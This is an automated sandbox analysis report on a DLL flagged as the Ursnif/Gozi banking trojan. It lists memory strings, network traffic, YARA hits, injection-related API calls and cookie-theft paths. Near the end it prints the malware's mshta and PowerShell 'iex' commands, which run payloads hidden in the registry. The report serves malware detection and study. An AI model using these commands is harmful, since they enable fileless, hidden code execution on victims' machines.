Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://onedrive.live.com/?qt=mru;Aktuelle
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://onedrive.live.com/?qt=mru;OneDrive-App
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://onedrive.live.com/?wt.mc_id=oo_msn_msnhomepage_header
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://onedrive.live.com/about/en/download/
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://onedrive.live.com;Fotos
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://onedrive.live.com;OneDrive-App
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://onedrive.live.com?wt.mc_id=oo_msn_msnhomepage_header
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://outlook.com/
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://outlook.live.com/calendar
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://outlook.live.com/mail/deeplink/compose;Kalender
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://play.google.com/intl/en_us/badges/images/generic/de_badge_web_generic.png"
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://play.google.com/store/apps/details?id=com.microsoft.amp.apps.bingnews&hl=de-ch&refer
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://portal.eu.numbereight.me/policies-license#software-privacy-notice
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://quantyoo.de/datenschutz
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://related.hu/adatkezeles/
Source: ~DF6EC85E7A5CABE297.TMP.3.dr	String found in binary or memory: https://res-a.akamaihd.net/__media__/pics/8000/72/941/fallback1.jpg
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://rover.ebay.com/rover/1/5222-53480-19255-0/1?mpre=https%3A%2F%2Fwww.ebay.ch&campid=533862
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://sp.booking.com/index.html?aid=1589774&label=dech-prime-hp-me
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://sp.booking.com/index.html?aid=1589774&label=dech-prime-hp-shoppingstripe-nav
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://sp.booking.com/index.html?aid=1589774&label=travelnavlink
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/de-ch/homepage/api/modules/cdnfetch"
Source: imagestore.dat.4.dr, imagestore.dat.3.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/519670.jpg
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB12jAN6.img?h=27&
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cEP3G.img?h=27&
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cG73h.img?h=27&
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cTAhN.img?h=368&amp
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBX2afX.img?h=27&w
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://support.skype.com
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://twitter.com/
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://twitter.com/i/notifications;Ich
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://web.vortex.data.msn.com/collect/v1
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://web.vortex.data.msn.com/collect/v1/t.gif?name=%27Ms.Webi.PageView%27&ver=%272.1%27&a
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://www.admo.tv/en/privacy-policy
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.awin1.com/cread.php?awinmid=11518&awinaffid=696593&clickref=dech-edge-dhp-infopa
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.awin1.com/cread.php?awinmid=15168&awinaffid=696593&clickref=de-ch&ued=https%
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.awin1.com/cread.php?awinmid=15168&awinaffid=696593&clickref=de-ch-edge-dhp-river
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.awin1.com/cread.php?awinmid=15168&awinaffid=696593&clickref=de-ch-ss&ued=htt
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://www.bet365affiliates.com/UI/Pages/Affiliates/Affiliates.aspx?ContentPath
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://www.bidstack.com/privacy-policy/
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://www.brightcom.com/privacy-policy/
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://www.gadsme.com/privacy-policy/
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/
Source: ~DF6EC85E7A5CABE297.TMP.3.dr	String found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp&item=deferred_page%3a1&ignorejs=webcore%2fmodules%2fjsb
Source: ~DF6EC85E7A5CABE297.TMP.3.dr	String found in binary or memory: https://www.msn.com/de-ch/?ocid=iehpC
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/homepage/api/modules/fetch"
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/homepage/api/pdp/updatepdpdata"
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/nachrichten/coronareisen
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/nachrichten/regional
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/bei-den-steuern-brauchts-jetzt-keine-unterschrift-mehr/ar-BB1cS
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/depression-wird-zum-schulstoff/ar-BB1cTOQU?ocid=hplocalnews
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/die-steuererkl%c3%a4rung-wird-digital-wie-z%c3%bcrcherinnen-und
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/im-alterszentrum-sydef%c3%a4deli-geschah-ein-tragischer-corona-
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/j%c3%bcdisches-online-treffen-mit-hitler-und-porno-bildern-gest
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/meta-hiltebrand-prangert-anonymen-hassbrief-an/ar-BB1cTJHG?ocid
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/sch%c3%bcler-positiv-auf-corona-mutation-getestet-alle-in-quara
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/sozialdemokraten-bef%c3%bcrworten-sozialdetektive/ar-BB1cTS5w?o
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/steuerhinterziehung-mit-hochkar%c3%a4tiger-kunst-in-der-causa-s
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/wenn-das-ganze-schulhaus-unter-quarant%c3%a4ne-gestellt-wird-wi
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com?form=MY01O4&OCID=MY01O4
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_QuickNote&auth=1
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_Recent&auth=1&wdorigin=msn
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_TopMenu&auth=1&wdorigin=msn
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://www.remixd.com/privacy_policy.html
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.ricardo.ch/?utm_source=msn&utm_medium=affiliate&utm_campaign=msn_mestripe_logo_d
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.ricardo.ch/?utm_source=msn&utm_medium=affiliate&utm_campaign=msn_shop_de&utm
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.skype.com/
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://www.skype.com/de
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://www.skype.com/de/download-skype
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://www.skype.com/go/onedrivepromo.download?cm_mmc=MSFT_2390_MSN-com
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.skyscanner.net/flights?associateid=API_B2B_19305_00001&vertical=custom&pageType=
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.skyscanner.net/g/referrals/v1/cars/home?associateid=API_B2B_19305_00002
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://www.stroeer.de/fileadmin/de/Konvergenz_und_Konzepte/Daten_und_Technologien/Stroeer_SSP/Downl
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoin
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://www.vidstart.com/wp-content/uploads/2018/09/PrivacyPolicyPDF-Vidstart.pdf

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49741 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Source: Yara match	File source: 00000001.00000003.316329983.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.316516876.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.440594075.0000000004380000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.371413612.0000000004B8C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.316461179.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.316586724.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000003.428145674.000001AE5B310000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.316557679.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.316421566.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.316536119.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.316489077.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.428887884.0000000000950000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 4896, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 4688, type: MEMORY

E-Banking Fraud:

Detected Gozi e-Banking trojan

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ff	1_2_0439CB16
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ff	1_2_0439CB16
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ie	1_2_0439CB16
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ie	1_2_0439CB16
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ie	1_2_0439CB16

Yara detected Ursnif

Source: Yara match	File source: 00000001.00000003.316329983.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.316516876.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.440594075.0000000004380000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.371413612.0000000004B8C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.316461179.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.316586724.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000003.428145674.000001AE5B310000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.316557679.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.316421566.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.316536119.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.316489077.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.428887884.0000000000950000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 4896, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 4688, type: MEMORY

System Summary:

Writes or reads registry keys via WMI

Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Writes registry values via WMI

Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Contains functionality to call native functions

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_0439547E NtWriteVirtualMemory,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,	1_2_0439547E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_0439C4B1 memcpy,memcpy,memcpy,NtUnmapViewOfSection,NtClose,memset,	1_2_0439C4B1
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_043875AA NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,	1_2_043875AA
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_0439EDF2 GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,	1_2_0439EDF2
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_0439AE64 GetProcAddress,NtCreateSection,memset,	1_2_0439AE64
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_04393013 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,	1_2_04393013
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_0438B8EB NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64,	1_2_0438B8EB
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_043938DD NtMapViewOfSection,	1_2_043938DD
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_04392131 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	1_2_04392131
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_0438B96C RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,	1_2_0438B96C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_0439DB15 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64,	1_2_0439DB15
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_0439E3F9 NtQueryInformationProcess,	1_2_0439E3F9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_0439FC10 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW,	1_2_0439FC10
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_0439BE7C memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,	1_2_0439BE7C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_043886CB NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,	1_2_043886CB
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_0439FF30 NtGetContextThread,RtlNtStatusToDosError,	1_2_0439FF30
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_04393F13 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,	1_2_04393F13
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_0439F7FD OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,	1_2_0439F7FD
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_043A096B memset,NtQueryInformationProcess,	1_2_043A096B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_04392B53 NtQuerySystemInformation,RtlNtStatusToDosError,	1_2_04392B53

Contains functionality to launch a process as a different user

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_04398C82 CreateProcessAsUserA,

1_2_04398C82

Detected potential crypto function

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_0438FCF3	1_2_0438FCF3
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_043A21B4	1_2_043A21B4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_0439D1D5	1_2_0439D1D5

PE file does not import any functions

Source: crd40oh3.dll.34.dr	Static PE information: No import functions for PE file found
Source: pzrffmak.dll.38.dr	Static PE information: No import functions for PE file found

Sample file is different than original file name gathered from version info

Source: 6007d134e83fctar.dll

Binary or memory string: OriginalFilenameLiquid.dllH vs 6007d134e83fctar.dll

Searches for the Microsoft Outlook file path

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Tries to load missing DLLs

Source: C:\Windows\SysWOW64\regsvr32.exe

Section loaded: sfc.dll

Jump to behavior

Uses 32bit PE files

Source: 6007d134e83fctar.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: classification engine

Classification label: mal100.bank.troj.evad.winDLL@30/169@15/2

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_0438A4FF CloseHandle,CloseHandle,CreateToolhelp32Snapshot,GetModuleHandleA,GetProcAddress,Thread32First,OpenThread,QueueUserAPC,CloseHandle,Thread32Next,CloseHandle,

1_2_0438A4FF

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe	Mutant created: \Sessions\1\BaseNamedObjects\{64B624D4-730E-3681-1DD8-57CAA18C7B9E}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\{F4A0C7E8-C357-461A-ED68-A7DA711CCBAE}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4572:120:WilError_01

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Temp\~DF9B1E57DEDF99BFAF.TMP

Jump to behavior

Source: 6007d134e83fctar.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll

Source: C:\Program Files\internet explorer\iexplore.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: regsvr32.exe

String found in binary or memory: EmailAddressCollection/EmailAddress[%u]/Address

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\6007d134e83fctar.dll'
Source: unknown	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\6007d134e83fctar.dll
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5660 CREDAT:17410 /prefetch:2
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5660 CREDAT:17426 /prefetch:2
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5660 CREDAT:17430 /prefetch:2
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5660 CREDAT:82968 /prefetch:2
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5660 CREDAT:17442 /prefetch:2
Source: unknown	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\Audiinrt'));if(!window.flag)close()</script>'
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
